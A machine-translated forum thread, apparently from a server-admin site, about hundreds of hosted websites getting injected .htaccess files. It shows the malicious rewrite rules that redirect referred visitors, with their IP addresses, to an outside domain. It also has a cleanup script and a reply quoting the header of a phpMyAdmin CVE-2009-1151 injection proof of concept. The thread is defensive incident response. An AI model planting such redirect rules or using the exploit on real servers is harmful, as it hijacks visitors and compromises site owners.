查找 Web 服务器漏洞

Bre*_*nt 6 security hacking .htaccess vulnerability apache-2.2

我们经营着一个托管大约 300 个网站的网络服务器群。

昨天早上,一个脚本将 www-data(apache 用户)拥有的 .htaccess 文件放置大多数(但不是全部)站点的 document_root 下的每个目录中

.htaccess 文件的内容是这样的:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}
Run Code Online (Sandbox Code Playgroud)

谷歌搜索那个 url(这是“防病毒”的 md5 哈希)我发现同样的事情发生在整个互联网上,我正在寻找已经处理过这个问题的人,并确定了漏洞在哪里

我已经搜索了我们的大部分日志,但还没有找到任何结论。有没有其他人经历过同样的事情,比我在查明漏洞方面做得更进一步?

到目前为止,我们已经确定:

  • 这些更改是作为 www-data 进行的,因此 apache 或其插件可能是罪魁祸首
  • 所有的更改都是在 15 分钟内完成的,所以它可能是自动化的
  • 由于我们的网站具有广泛不同的域名,我认为一个站点上的单个漏洞是有责任的(而不是每个站点上的常见漏洞)
  • 如果一个 .htaccess 文件已经存在并且可以被 www-data 写入,那么该脚本是友好的,只需将上述行附加到文件的末尾(使其易于反转)

任何更多提示将不胜感激。

==编辑==

对于那些需要它的人,这里是我用来清理 .htaccess 文件的脚本:

#!/bin/bash
PATT=84f6a4eef61784b33e4acbd32c8fdd72.com
DIR=/mnt
TMP=/tmp/`mktemp "XXXXXX"`
find $DIR -name .htaccess|while read FILE; do
  if ( grep $PATT "$FILE" > /dev/null); then
    if [ `cat "$FILE"|wc -l` -eq 4 ]; then
      rm "$FILE"
    else
      if ( tail -n1 "$FILE"|grep $PATT > /dev/null ); then
        rm $TMP
        cp "$FILE" $TMP
        LINES=`cat $TMP|wc -l`
        GOODLINES=$(($LINES-4))
        head -n $GOODLINES $TMP > "$FILE"
      else
        echo $FILE requires manual intervention
      fi
    fi
  fi
done
Run Code Online (Sandbox Code Playgroud)

Red*_*ick 3

phpMyAdmin存在漏洞

#!/bin/bash

# CVE-2009-1151:phpMyAdmin '/scripts/setup.php' PHP 代码注入 RCE PoC v0.11
# by pagvac (gnucitizen.org),2009 年 6 月 4 日。
# 特别感谢 Greg Ose (labs.neohapsis.com)为了发现如此酷的漏洞,
# 并访问 str0ke (milw0rm.com) 来测试这个 PoC 脚本并提供反馈!

# PoC 脚本已在以下目标上成功测试:
# phpMyAdmin 2.11.4、2.11.9.3、2.11.9.4、3.0.0 和 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# 攻击要求:
# 1) 易受攻击的版本(显然!):2.11.9.5 之前的 2.11.x
# 和 3.1.3.1 之前的 3.x,根据 PMASA-2009-3
# 2) 看来这个漏洞只能针对环境进行利用
# 管理员选择按照向导方法安装 phpMyAdmin
,而不是手动方法:http ://snipurl.com/jhjxx
# 3) 管理员必须没有删除 '
/phpMyAdmin 中的'/config/' 目录/' 目录。这是因为这个目录是
# '/scripts/setup.php' 尝试创建 'config.inc.php' 的地方
# 我们的邪恶 PHP 代码被注入 8)

# 更多信息:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009- 1151/